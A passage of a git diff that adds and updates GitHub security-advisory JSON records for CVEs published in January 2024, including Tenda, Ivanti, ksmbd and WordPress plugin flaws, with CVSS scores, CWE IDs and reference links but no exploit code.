"https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html" + }, { "type": "WEB", "url": "https://source.android.com/security/bulletin/2023-12-01" + }, + { + "type": "WEB", + "url": "https://www.fairphone.com/en/2024/01/30/security-update-apex-modules-vulnerability-fixed/" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json b/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json index e8c2f3384a3e3..13b7ac88f2dc9 100644 --- a/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json +++ b/advisories/unreviewed/2023/12/GHSA-xp6x-8hgv-x5w5/GHSA-xp6x-8hgv-x5w5.json @@ -101,6 +101,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-December/003435.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240125-0003/" diff --git a/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json b/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json index 67ff919089080..3f1322c0ab3cb 100644 --- a/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json +++ b/advisories/unreviewed/2024/01/GHSA-22x3-v6j4-627v/GHSA-22x3-v6j4-627v.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-2348-p6m3-vqc4/GHSA-2348-p6m3-vqc4.json b/advisories/unreviewed/2024/01/GHSA-2348-p6m3-vqc4/GHSA-2348-p6m3-vqc4.json new file mode 100644 index 0000000000000..d5db83dc9058b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2348-p6m3-vqc4/GHSA-2348-p6m3-vqc4.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2348-p6m3-vqc4", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0995" + ], + "details": "A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been rated as critical. Affected by this issue is the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252260. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0995" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252260" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252260" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T02:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json b/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json index a230dbe92e443..0214af8cedef2 100644 --- a/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json +++ b/advisories/unreviewed/2024/01/GHSA-23p4-xxgc-xqvf/GHSA-23p4-xxgc-xqvf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-23p4-xxgc-xqvf", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2021-42143" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. An infinite loop bug exists during the handling of a ClientHello handshake message. This bug allows remote attackers to cause a denial of service by sending a malformed ClientHello handshake message with an odd length of cipher suites, which triggers an infinite loop (consuming all resources) and a buffer over-read that can disclose sensitive information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-835" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-24gf-6m5f-h6pg/GHSA-24gf-6m5f-h6pg.json b/advisories/unreviewed/2024/01/GHSA-24gf-6m5f-h6pg/GHSA-24gf-6m5f-h6pg.json new file mode 100644 index 0000000000000..6eacc33f20332 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-24gf-6m5f-h6pg/GHSA-24gf-6m5f-h6pg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-24gf-6m5f-h6pg", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-21888" + ], + "details": "A privilege escalation vulnerability in web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows a user to elevate privileges to that of an administrator. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21888" + }, + { + "type": "WEB", + "url": "https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json b/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json index 0744846873488..49e5c81b9140d 100644 --- a/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json +++ b/advisories/unreviewed/2024/01/GHSA-2572-4xw7-mcfc/GHSA-2572-4xw7-mcfc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2572-4xw7-mcfc", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-22705" ], "details": "An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-125" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T11:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-257p-qfc7-7ff5/GHSA-257p-qfc7-7ff5.json b/advisories/unreviewed/2024/01/GHSA-257p-qfc7-7ff5/GHSA-257p-qfc7-7ff5.json new file mode 100644 index 0000000000000..3912683c662ac --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-257p-qfc7-7ff5/GHSA-257p-qfc7-7ff5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-257p-qfc7-7ff5", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-23747" + ], + "details": "The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23747" + }, + { + "type": "WEB", + "url": "https://github.com/louiselalanne/CVE-2024-23747" + }, + { + "type": "WEB", + "url": "https://modernasistemas.com.br/sitems/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-25g8-7mhh-fm84/GHSA-25g8-7mhh-fm84.json b/advisories/unreviewed/2024/01/GHSA-25g8-7mhh-fm84/GHSA-25g8-7mhh-fm84.json new file mode 100644 index 0000000000000..10f3a4095f214 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-25g8-7mhh-fm84/GHSA-25g8-7mhh-fm84.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25g8-7mhh-fm84", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7200" + ], + "details": "The EventON WordPress plugin before 4.4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7200" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/586cf0a5-515c-43ea-8c03-f2f47ed13c2c/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json b/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json index c7cb4c2db6f10..7bb027be1abe9 100644 --- a/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json +++ b/advisories/unreviewed/2024/01/GHSA-25vp-v4qh-h9xj/GHSA-25vp-v4qh-h9xj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-25vp-v4qh-h9xj", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-22662" ], "details": "TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T15:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-2798-r58g-fffv/GHSA-2798-r58g-fffv.json b/advisories/unreviewed/2024/01/GHSA-2798-r58g-fffv/GHSA-2798-r58g-fffv.json new file mode 100644 index 0000000000000..a00d15a5ff4ac --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2798-r58g-fffv/GHSA-2798-r58g-fffv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2798-r58g-fffv", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-21916" + ], + "details": "\nA denial-of-service vulnerability exists in specific Rockwell Automation ControlLogix ang GuardLogix controllers. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21916" + }, + { + "type": "WEB", + "url": "https://www.rockwellautomation.com/en-us/support/advisory.SD1661.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-27hv-w8j5-r6ww/GHSA-27hv-w8j5-r6ww.json b/advisories/unreviewed/2024/01/GHSA-27hv-w8j5-r6ww/GHSA-27hv-w8j5-r6ww.json new file mode 100644 index 0000000000000..96d825d78bcac --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-27hv-w8j5-r6ww/GHSA-27hv-w8j5-r6ww.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27hv-w8j5-r6ww", + "modified": "2024-02-06T21:30:25Z", + "published": "2024-01-31T03:30:30Z", + "aliases": [ + "CVE-2024-23745" + ], + "details": "In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23745" + }, + { + "type": "WEB", + "url": "https://github.com/louiselalanne/CVE-2024-23745" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T02:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json b/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json index 337c7350025a4..50af38ed314ab 100644 --- a/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json +++ b/advisories/unreviewed/2024/01/GHSA-288h-h8hx-vvqm/GHSA-288h-h8hx-vvqm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-288h-h8hx-vvqm", - "modified": "2024-01-24T00:30:33Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-24T00:30:33Z", "aliases": [ "CVE-2024-23453" ], "details": "Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-798" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json b/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json index 8a2be85d38b3a..60f04edaa6b72 100644 --- a/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json +++ b/advisories/unreviewed/2024/01/GHSA-28jc-7xfh-6mvp/GHSA-28jc-7xfh-6mvp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-28jc-7xfh-6mvp", - "modified": "2024-01-25T03:30:59Z", + "modified": "2024-02-02T06:30:31Z", "published": "2024-01-25T03:30:59Z", "aliases": [ "CVE-2024-0625" @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-2934-h34j-g33x/GHSA-2934-h34j-g33x.json b/advisories/unreviewed/2024/01/GHSA-2934-h34j-g33x/GHSA-2934-h34j-g33x.json new file mode 100644 index 0000000000000..102aad5d2e2af --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2934-h34j-g33x/GHSA-2934-h34j-g33x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2934-h34j-g33x", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51813" + ], + "details": "Cross Site Request Forgery (CSRF) vulnerability in Free Open-Source Inventory Management System v.1.0 allows a remote attacker to execute arbitrary code via the staff_list parameter in the index.php component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51813" + }, + { + "type": "WEB", + "url": "https://github.com/xxxxfang/CVE-Apply/blob/main/csrf-1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json b/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json index 8c7bcf9b833c0..a1ba3a088aebe 100644 --- a/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json +++ b/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-2f9q-qvgh-8gvv/GHSA-2f9q-qvgh-8gvv.json b/advisories/unreviewed/2024/01/GHSA-2f9q-qvgh-8gvv/GHSA-2f9q-qvgh-8gvv.json new file mode 100644 index 0000000000000..81e89c8829b98 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2f9q-qvgh-8gvv/GHSA-2f9q-qvgh-8gvv.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2f9q-qvgh-8gvv", + "modified": "2024-01-29T00:30:17Z", + "published": "2024-01-29T00:30:17Z", + "aliases": [ + "CVE-2024-0987" + ], + "details": "A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0987" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/mhLwGOcLxYfP" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252252" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252252" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-116", + "CWE-117" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json b/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json index 946c52687bd85..08dc35f30df19 100644 --- a/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json +++ b/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2fpf-9qrw-vj6r", - "modified": "2024-01-27T00:31:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T00:31:23Z", "aliases": [ "CVE-2024-23506" diff --git a/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json b/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json index 05611bec2aa08..26ae4e4054db5 100644 --- a/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json +++ b/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2g55-8535-gp6f", - "modified": "2024-01-25T09:30:21Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T09:30:21Z", "aliases": [ "CVE-2023-33758" ], "details": "Splicecom Maximiser Soft PBX v1.5 and before was discovered to contain a cross-site scripting (XSS) vulnerability via the CLIENT_NAME and DEVICE_GUID fields in the login component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T08:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-2gc5-r3m4-5vgx/GHSA-2gc5-r3m4-5vgx.json b/advisories/unreviewed/2024/01/GHSA-2gc5-r3m4-5vgx/GHSA-2gc5-r3m4-5vgx.json new file mode 100644 index 0000000000000..1ba0350683a16 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2gc5-r3m4-5vgx/GHSA-2gc5-r3m4-5vgx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gc5-r3m4-5vgx", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-31T00:30:17Z", + "aliases": [ + "CVE-2023-51198" + ], + "details": "An issue in the permission and access control components within ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to gain escalate privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51198" + }, + { + "type": "WEB", + "url": "https://github.com/16yashpatel/CVE-2023-51198" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2hpw-wm7x-857p/GHSA-2hpw-wm7x-857p.json b/advisories/unreviewed/2024/01/GHSA-2hpw-wm7x-857p/GHSA-2hpw-wm7x-857p.json new file mode 100644 index 0000000000000..2809a56fee095 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2hpw-wm7x-857p/GHSA-2hpw-wm7x-857p.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2hpw-wm7x-857p", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1116" + ], + "details": "A vulnerability was found in openBI up to 1.0.8. It has been classified as critical. Affected is the function index of the file /application/plugins/controller/Upload.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252474 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1116" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/uCElTQRGWVyw" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252474" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252474" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2jf4-qrjv-8cx6/GHSA-2jf4-qrjv-8cx6.json b/advisories/unreviewed/2024/01/GHSA-2jf4-qrjv-8cx6/GHSA-2jf4-qrjv-8cx6.json new file mode 100644 index 0000000000000..469407f9bf3a6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2jf4-qrjv-8cx6/GHSA-2jf4-qrjv-8cx6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2jf4-qrjv-8cx6", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T12:30:18Z", + "aliases": [ + "CVE-2024-22305" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in ali Forms Contact Form builder with drag & drop for WordPress – Kali Forms.This issue affects Contact Form builder with drag & drop for WordPress – Kali Forms: from n/a through 2.3.36.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22305" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/kali-forms/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2jx2-r7f9-93pw/GHSA-2jx2-r7f9-93pw.json b/advisories/unreviewed/2024/01/GHSA-2jx2-r7f9-93pw/GHSA-2jx2-r7f9-93pw.json new file mode 100644 index 0000000000000..4f6c61b3c0678 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2jx2-r7f9-93pw/GHSA-2jx2-r7f9-93pw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2jx2-r7f9-93pw", + "modified": "2024-02-02T18:30:29Z", + "published": "2024-01-29T00:30:17Z", + "aliases": [ + "CVE-2024-23782" + ], + "details": "Cross-site scripting vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier versions. If this vulnerability is exploited, a user with a contributor or higher privilege may execute an arbitrary script on the web browser of the user who accessed the website using the product.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23782" + }, + { + "type": "WEB", + "url": "https://developer.a-blogcms.jp/blog/news/JVN-34565930.html" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN34565930/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-28T23:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2m5x-r2g7-72x8/GHSA-2m5x-r2g7-72x8.json b/advisories/unreviewed/2024/01/GHSA-2m5x-r2g7-72x8/GHSA-2m5x-r2g7-72x8.json new file mode 100644 index 0000000000000..11f92b952dc1b --- /dev/null +++ 